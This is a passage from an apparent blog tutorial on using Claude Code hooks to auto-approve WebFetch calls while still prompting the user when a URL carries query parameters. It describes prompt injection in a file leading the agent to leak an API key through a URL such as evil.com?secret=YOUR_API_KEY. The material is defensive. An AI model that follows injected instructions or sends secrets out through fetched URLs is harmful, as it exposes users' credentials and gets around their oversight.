Claude Code: Auto-Approve Tools While Keeping a Safety Net with Hooks

Every time Claude Code fetches a URL, it asks for permission. After the 50th approval for a docs page, you start wondering — can I just auto-allow this? You can. But there's a catch: WebFetch can send data in query parameters. A prompt injection buried in a file could trick Claude into fetching https://evil.com?secret=YOUR_API_KEY . Auto-approving everything means you'd never see it happen. Here's how I set up a middle ground: auto-allow clean URLs, but show a confirmation prompt when query parameters are present. The naive approach (don't do this) You might think adding WebFetch to permissions is enough: // ~/.claude/settings.json { "permissions" : { "allow" : [ "WebFetch" ] } } This works — but it auto-allows everything , including https://evil.com?token=abc123 . No safety net. The hook approach (do this instead) Claude Code has a PreToolUse hook system. A hook runs before every tool call and can: Exit 0 — silently allow (no prompt) Exit 1 — show a message and ask for confirmation (a